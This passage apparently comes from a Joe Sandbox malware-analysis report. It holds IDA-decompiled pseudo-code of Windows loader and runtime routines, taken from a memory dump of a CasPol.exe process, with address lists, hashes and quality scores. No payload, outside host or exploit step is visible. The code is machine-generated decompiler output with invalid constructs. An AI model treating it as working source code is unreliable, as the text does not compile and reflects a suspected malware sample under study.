                                                                                                                                                                                                                                                                                                						_v24 = _t165;
                                                                                                                                                                                                                                                                                                						_v28 = _v40;
                                                                                                                                                                                                                                                                                                						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                                                                                                                                                                                                                                                                                                						_t221 = _v40;
                                                                                                                                                                                                                                                                                                						_v16 =  *_v92;
                                                                                                                                                                                                                                                                                                						_v32 =  &_v28;
                                                                                                                                                                                                                                                                                                						if( *(_t237 + 0x4e) >> 0xf == 0) {
                                                                                                                                                                                                                                                                                                							goto L9;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						_t240 = _v48;
                                                                                                                                                                                                                                                                                                						if( *_v92 != 0x80000000) {
                                                                                                                                                                                                                                                                                                							goto L9;
                                                                                                                                                                                                                                                                                                						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0176D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E01742280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L01744620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0176F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								L0173FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x181b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return L0176B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
                                                                                                                                                                                                                                                                                                					_v80 = _t208;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				if(_v105 == 0) {
                                                                                                                                                                                                                                                                                                					_v36 = _v36 & 0x00000000;
                                                                                                                                                                                                                                                                                                					_t208 = 0;
                                                                                                                                                                                                                                                                                                					_t247 = 0;
                                                                                                                                                                                                                                                                                                					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                                                                                                                                                                                                                                                                                                					goto L19;
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					_v36 = 1;
                                                                                                                                                                                                                                                                                                					goto L8;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                			}































































                                                                                                                                                                                                                                                                                                0x01796f93
                                                                                                                                                                                                                                                                                                0x01796f98
                                                                                                                                                                                                                                                                                                0x01796fa0
                                                                                                                                                                                                                                                                                                0x01796fa6
                                                                                                                                                                                                                                                                                                0x01796fb3
                                                                                                                                                                                                                                                                                                0x01796fb6
                                                                                                                                                                                                                                                                                                0x01796fbf
                                                                                                                                                                                                                                                                                                0x01796fc1
                                                                                                                                                                                                                                                                                                0x01796fd5
                                                                                                                                                                                                                                                                                                0x01796fda
                                                                                                                                                                                                                                                                                                0x01796fda
                                                                                                                                                                                                                                                                                                0x01796fdd
                                                                                                                                                                                                                                                                                                0x01796fe2
                                                                                                                                                                                                                                                                                                0x01796fe7
                                                                                                                                                                                                                                                                                                0x01796feb
                                                                                                                                                                                                                                                                                                0x01796fef
                                                                                                                                                                                                                                                                                                0x01796ff3
                                                                                                                                                                                                                                                                                                0x0175520c
                                                                                                                                                                                                                                                                                                0x0175520c
                                                                                                                                                                                                                                                                                                0x0175520f
                                                                                                                                                                                                                                                                                                0x01755215
                                                                                                                                                                                                                                                                                                0x01755234
                                                                                                                                                                                                                                                                                                0x0175523a
                                                                                                                                                                                                                                                                                                0x0175523a
                                                                                                                                                                                                                                                                                                0x01755244
                                                                                                                                                                                                                                                                                                0x01755245
                                                                                                                                                                                                                                                                                                0x01755246
                                                                                                                                                                                                                                                                                                0x01755251
                                                                                                                                                                                                                                                                                                0x01755251
                                                                                                                                                                                                                                                                                                0x01796f13
                                                                                                                                                                                                                                                                                                0x01796f17
                                                                                                                                                                                                                                                                                                0x01796f17
                                                                                                                                                                                                                                                                                                0x01796f18
                                                                                                                                                                                                                                                                                                0x01796f1b
                                                                                                                                                                                                                                                                                                0x01796f1f
                                                                                                                                                                                                                                                                                                0x01796f23
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01796f28
                                                                                                                                                                                                                                                                                                0x01755204
                                                                                                                                                                                                                                                                                                0x01755204
                                                                                                                                                                                                                                                                                                0x01755208
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01755208
                                                                                                                                                                                                                                                                                                0x01755185
                                                                                                                                                                                                                                                                                                0x01755188
                                                                                                                                                                                                                                                                                                0x0175518a
                                                                                                                                                                                                                                                                                                0x0175518e
                                                                                                                                                                                                                                                                                                0x01755195
                                                                                                                                                                                                                                                                                                0x01796db1
                                                                                                                                                                                                                                                                                                0x01796db5
                                                                                                                                                                                                                                                                                                0x01796db9
                                                                                                                                                                                                                                                                                                0x0175519b
                                                                                                                                                                                                                                                                                                0x0175519b
                                                                                                                                                                                                                                                                                                0x0175519e
                                                                                                                                                                                                                                                                                                0x017551a7
                                                                                                                                                                                                                                                                                                0x017551a9
                                                                                                                                                                                                                                                                                                0x017551a9
                                                                                                                                                                                                                                                                                                0x017551b5
                                                                                                                                                                                                                                                                                                0x017551b8
                                                                                                                                                                                                                                                                                                0x017551bb
                                                                                                                                                                                                                                                                                                0x017551be
                                                                                                                                                                                                                                                                                                0x017551c1
                                                                                                                                                                                                                                                                                                0x017551c5
                                                                                                                                                                                                                                                                                                0x017551c9
                                                                                                                                                                                                                                                                                                0x017551cd
                                                                                                                                                                                                                                                                                                0x017551cd
                                                                                                                                                                                                                                                                                                0x017551d8
                                                                                                                                                                                                                                                                                                0x017551dc
                                                                                                                                                                                                                                                                                                0x017551e0
                                                                                                                                                                                                                                                                                                0x01796dcc
                                                                                                                                                                                                                                                                                                0x01796dd0
                                                                                                                                                                                                                                                                                                0x01796dd5
                                                                                                                                                                                                                                                                                                0x01796ddd
                                                                                                                                                                                                                                                                                                0x01796de1
                                                                                                                                                                                                                                                                                                0x01796de1
                                                                                                                                                                                                                                                                                                0x01796de5
                                                                                                                                                                                                                                                                                                0x01796deb
                                                                                                                                                                                                                                                                                                0x01796df1
                                                                                                                                                                                                                                                                                                0x01796df7
                                                                                                                                                                                                                                                                                                0x01796dfd
                                                                                                                                                                                                                                                                                                0x01796e01
                                                                                                                                                                                                                                                                                                0x01796e05
                                                                                                                                                                                                                                                                                                0x01796e09
                                                                                                                                                                                                                                                                                                0x01796e0d
                                                                                                                                                                                                                                                                                                0x01796e11
                                                                                                                                                                                                                                                                                                0x01796e11
                                                                                                                                                                                                                                                                                                0x017551eb
                                                                                                                                                                                                                                                                                                0x01796e1a
                                                                                                                                                                                                                                                                                                0x01796e1f
                                                                                                                                                                                                                                                                                                0x01796e21
                                                                                                                                                                                                                                                                                                0x01796e23
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017551f1
                                                                                                                                                                                                                                                                                                0x017551f1
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017551f1

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                                                                                			E017503E2(signed int __ecx, signed int __edx) {
                                                                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                                                                                                                				signed int _v20;
                                                                                                                                                                                                                                                                                                				signed int _v24;
                                                                                                                                                                                                                                                                                                				signed int _v28;
                                                                                                                                                                                                                                                                                                				signed int _v32;
                                                                                                                                                                                                                                                                                                				signed int _v36;
                                                                                                                                                                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                                                                                                                                                                				signed int _v44;
                                                                                                                                                                                                                                                                                                				signed int _v48;
                                                                                                                                                                                                                                                                                                				char _v52;
                                                                                                                                                                                                                                                                                                				char _v56;
                                                                                                                                                                                                                                                                                                				char _v64;
                                                                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                                                                				signed int _t56;
                                                                                                                                                                                                                                                                                                				signed int _t58;
                                                                                                                                                                                                                                                                                                				char* _t64;
                                                                                                                                                                                                                                                                                                				intOrPtr _t65;
                                                                                                                                                                                                                                                                                                				signed int _t74;
                                                                                                                                                                                                                                                                                                				signed int _t79;
                                                                                                                                                                                                                                                                                                				char* _t83;
                                                                                                                                                                                                                                                                                                				intOrPtr _t84;
                                                                                                                                                                                                                                                                                                				signed int _t93;
                                                                                                                                                                                                                                                                                                				signed int _t94;
                                                                                                                                                                                                                                                                                                				signed char* _t95;
                                                                                                                                                                                                                                                                                                				signed int _t99;
                                                                                                                                                                                                                                                                                                				signed int _t100;
                                                                                                                                                                                                                                                                                                				signed char* _t101;
                                                                                                                                                                                                                                                                                                				signed int _t105;
                                                                                                                                                                                                                                                                                                				signed int _t119;
                                                                                                                                                                                                                                                                                                				signed int _t120;
                                                                                                                                                                                                                                                                                                				void* _t122;
                                                                                                                                                                                                                                                                                                				signed int _t123;
                                                                                                                                                                                                                                                                                                				signed int _t127;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_v8 =  *0x181d360 ^ _t127;
                                                                                                                                                                                                                                                                                                				_t119 = __ecx;
                                                                                                                                                                                                                                                                                                				_t105 = __edx;
                                                                                                                                                                                                                                                                                                				_t118 = 0;
                                                                                                                                                                                                                                                                                                				_v20 = __edx;
                                                                                                                                                                                                                                                                                                				_t120 =  *(__ecx + 0x20);
                                                                                                                                                                                                                                                                                                				if(E01750548(__ecx, 0) != 0) {
                                                                                                                                                                                                                                                                                                					_t56 = 0xc000022d;
                                                                                                                                                                                                                                                                                                					L23:
                                                                                                                                                                                                                                                                                                					return L0176B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					_v12 = _v12 | 0xffffffff;
                                                                                                                                                                                                                                                                                                					_t58 = _t120 + 0x24;
                                                                                                                                                                                                                                                                                                					_t109 =  *(_t120 + 0x18);
                                                                                                                                                                                                                                                                                                					_t118 = _t58;
                                                                                                                                                                                                                                                                                                					_v16 = _t58;
                                                                                                                                                                                                                                                                                                					E0173B02A( *(_t120 + 0x18), _t118, 0x14a5);
                                                                                                                                                                                                                                                                                                					_v52 = 0x18;
                                                                                                                                                                                                                                                                                                					_v48 = 0;
                                                                                                                                                                                                                                                                                                					0x840 = 0x40;
                                                                                                                                                                                                                                                                                                					if( *0x1817c1c != 0) {
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					_v40 = 0x840;
                                                                                                                                                                                                                                                                                                					_v44 = _t105;
                                                                                                                                                                                                                                                                                                					_v36 = 0;
                                                                                                                                                                                                                                                                                                					_v32 = 0;
                                                                                                                                                                                                                                                                                                					if(E01747D50() != 0) {
                                                                                                                                                                                                                                                                                                						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                                                                						_t64 = 0x7ffe0384;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					if( *_t64 != 0) {
                                                                                                                                                                                                                                                                                                						_t65 =  *[fs:0x30];
                                                                                                                                                                                                                                                                                                						__eflags =  *(_t65 + 0x240) & 0x00000004;
                                                                                                                                                                                                                                                                                                						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                                							_t100 = E01747D50();
                                                                                                                                                                                                                                                                                                							__eflags = _t100;
                                                                                                                                                                                                                                                                                                							if(_t100 == 0) {
                                                                                                                                                                                                                                                                                                								_t101 = 0x7ffe0385;
                                                                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                                                                								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                							__eflags =  *_t101 & 0x00000020;
                                                                                                                                                                                                                                                                                                							if(( *_t101 & 0x00000020) != 0) {
                                                                                                                                                                                                                                                                                                								_t118 = _t118 | 0xffffffff;
                                                                                                                                                                                                                                                                                                								_t109 = 0x1485;
								E017A7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E01769830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E017A69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x1817c04 != 0) {
						_t118 = _v12;
						_t120 = L017AA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x1817bd8;
						if( *0x1817bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E017695D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E017699A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E017A3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0172B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0176AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x1818474 - 3;
										if( *0x1818474 != 3) {
											 *0x18179dc =  *0x18179dc + 1;
										}
									}
								}
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						goto L52;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					if(E01747D50() != 0) {
                                                                                                                                                                                                                                                                                                						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                                                                						_t83 = 0x7ffe0384;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					if( *_t83 != 0) {
                                                                                                                                                                                                                                                                                                						_t84 =  *[fs:0x30];
                                                                                                                                                                                                                                                                                                						__eflags =  *(_t84 + 0x240) & 0x00000004;
                                                                                                                                                                                                                                                                                                						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                                							_t94 = E01747D50();
                                                                                                                                                                                                                                                                                                							__eflags = _t94;
                                                                                                                                                                                                                                                                                                							if(_t94 == 0) {
                                                                                                                                                                                                                                                                                                								_t95 = 0x7ffe0385;
                                                                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                                                                								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                							__eflags =  *_t95 & 0x00000020;
                                                                                                                                                                                                                                                                                                							if(( *_t95 & 0x00000020) != 0) {
                                                                                                                                                                                                                                                                                                								E017A7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                                                                                                                                                                                                                                                                                                						if( *0x1818708 != 0) {
                                                                                                                                                                                                                                                                                                							_t118 =  *0x7ffe0330;
                                                                                                                                                                                                                                                                                                							_t123 =  *0x1817b00; // 0x0
                                                                                                                                                                                                                                                                                                							asm("ror esi, cl");
                                                                                                                                                                                                                                                                                                							 *0x181b1e0(_v12, _v20, 0x20);
                                                                                                                                                                                                                                                                                                							_t93 =  *(_t123 ^  *0x7ffe0330)();
                                                                                                                                                                                                                                                                                                							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                                                                                                                                                                                                                                                                                                							asm("sbb esi, esi");
                                                                                                                                                                                                                                                                                                							_t120 =  ~_t50 & _t93;
                                                                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                                                                							_t120 = 0;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					if( !_t120 >= 0) {
                                                                                                                                                                                                                                                                                                						L19:
                                                                                                                                                                                                                                                                                                						_push( *_t105);
                                                                                                                                                                                                                                                                                                						E017695D0();
                                                                                                                                                                                                                                                                                                						 *_t105 =  *_t105 & 0x00000000;
                                                                                                                                                                                                                                                                                                						goto L20;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					_t120 = L01737F65(_t119);
                                                                                                                                                                                                                                                                                                					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                                                                                                                                                                                                                                                                                                						__eflags = _t120;
                                                                                                                                                                                                                                                                                                						if(_t120 < 0) {
                                                                                                                                                                                                                                                                                                							goto L19;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						 *(_t119 + 0x64) = _v12;
                                                                                                                                                                                                                                                                                                						goto L22;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					goto L19;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                			}
                                                                                                                                                                                                                                                                                                0x01794cda
                                                                                                                                                                                                                                                                                                0x01794cdf
                                                                                                                                                                                                                                                                                                0x01794cdf
                                                                                                                                                                                                                                                                                                0x01794ccb
                                                                                                                                                                                                                                                                                                0x01794ca4
                                                                                                                                                                                                                                                                                                0x0175046d
                                                                                                                                                                                                                                                                                                0x0175046f
                                                                                                                                                                                                                                                                                                0x0175046f
                                                                                                                                                                                                                                                                                                0x01750471
                                                                                                                                                                                                                                                                                                0x01750476
                                                                                                                                                                                                                                                                                                0x0175047a
                                                                                                                                                                                                                                                                                                0x0175047b
                                                                                                                                                                                                                                                                                                0x01750483
                                                                                                                                                                                                                                                                                                0x01750489
                                                                                                                                                                                                                                                                                                0x0175048d
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01794ce9
                                                                                                                                                                                                                                                                                                0x01794cef
                                                                                                                                                                                                                                                                                                0x01794d22
                                                                                                                                                                                                                                                                                                0x01794d22
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01794d22
                                                                                                                                                                                                                                                                                                0x01794cf1
                                                                                                                                                                                                                                                                                                0x01794cf7
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01794cf9
                                                                                                                                                                                                                                                                                                0x01794cff
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01794d05
                                                                                                                                                                                                                                                                                                0x01794d07
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01794d0d
                                                                                                                                                                                                                                                                                                0x01794d0f
                                                                                                                                                                                                                                                                                                0x01794d14
                                                                                                                                                                                                                                                                                                0x01794d16
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01794d1c
                                                                                                                                                                                                                                                                                                0x01794d1c
                                                                                                                                                                                                                                                                                                0x01750499
                                                                                                                                                                                                                                                                                                0x01750535
                                                                                                                                                                                                                                                                                                0x01750535
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01750535
                                                                                                                                                                                                                                                                                                0x017504a6
                                                                                                                                                                                                                                                                                                0x01794d2c
                                                                                                                                                                                                                                                                                                0x01794d37
                                                                                                                                                                                                                                                                                                0x01794d39
                                                                                                                                                                                                                                                                                                0x01794d3b
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01794d41
                                                                                                                                                                                                                                                                                                0x01794d48
                                                                                                                                                                                                                                                                                                0x01750527
                                                                                                                                                                                                                                                                                                0x0175052b
                                                                                                                                                                                                                                                                                                0x0175052d
                                                                                                                                                                                                                                                                                                0x01750530
                                                                                                                                                                                                                                                                                                0x01750530
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175052b
                                                                                                                                                                                                                                                                                                0x01794d4e
                                                                                                                                                                                                                                                                                                0x017504ac
                                                                                                                                                                                                                                                                                                0x017504ac
                                                                                                                                                                                                                                                                                                0x017504af
                                                                                                                                                                                                                                                                                                0x017504b2
                                                                                                                                                                                                                                                                                                0x017504b7
                                                                                                                                                                                                                                                                                                0x017504b9
                                                                                                                                                                                                                                                                                                0x017504bb
                                                                                                                                                                                                                                                                                                0x017504bd
                                                                                                                                                                                                                                                                                                0x017504bf
                                                                                                                                                                                                                                                                                                0x017504c5
                                                                                                                                                                                                                                                                                                0x017504c9
                                                                                                                                                                                                                                                                                                0x01794d53
                                                                                                                                                                                                                                                                                                0x01794d59
                                                                                                                                                                                                                                                                                                0x01794db9
                                                                                                                                                                                                                                                                                                0x01794dba
                                                                                                                                                                                                                                                                                                0x01794dbf
                                                                                                                                                                                                                                                                                                0x01794dc2
                                                                                                                                                                                                                                                                                                0x01794dc4
                                                                                                                                                                                                                                                                                                0x01794dc7
                                                                                                                                                                                                                                                                                                0x01794dce
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01794dce
                                                                                                                                                                                                                                                                                                0x01794d5b
                                                                                                                                                                                                                                                                                                0x01794d61
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01794d63
                                                                                                                                                                                                                                                                                                0x01794d69
                                                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: c9ed41537d89887946bd09853b822247da5ed387e08664f6e94ce4cf4c2af892
                                                                                                                                                                                                                                                                                                • Instruction ID: a7ca02d11cc5281ab6277e23a58a977d455edbf93e27b9f190be1ab529bfd063
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9ed41537d89887946bd09853b822247da5ed387e08664f6e94ce4cf4c2af892
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81918831E00255AFEF328B6CD948BADFFA4AB02724F150265FE11AB2D1D7B49D45CB81
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 39%
                                                                                                                                                                                                                                                                                                			E017BB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                                                                                                                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                                                                                				signed int _t80;
                                                                                                                                                                                                                                                                                                				signed int _t83;
                                                                                                                                                                                                                                                                                                				intOrPtr _t89;
                                                                                                                                                                                                                                                                                                				signed int _t92;
                                                                                                                                                                                                                                                                                                				signed char _t106;
                                                                                                                                                                                                                                                                                                				signed int* _t107;
                                                                                                                                                                                                                                                                                                				intOrPtr _t108;
                                                                                                                                                                                                                                                                                                				intOrPtr _t109;
                                                                                                                                                                                                                                                                                                				signed int _t114;
                                                                                                                                                                                                                                                                                                				void* _t115;
                                                                                                                                                                                                                                                                                                				void* _t117;
                                                                                                                                                                                                                                                                                                				void* _t119;
                                                                                                                                                                                                                                                                                                				void* _t122;
                                                                                                                                                                                                                                                                                                				signed int _t123;
                                                                                                                                                                                                                                                                                                				signed int* _t124;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t106 = _a12;
                                                                                                                                                                                                                                                                                                				if((_t106 & 0xfffffffc) != 0) {
                                                                                                                                                                                                                                                                                                					return 0xc000000d;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				if((_t106 & 0x00000002) != 0) {
                                                                                                                                                                                                                                                                                                					_t106 = _t106 | 0x00000001;
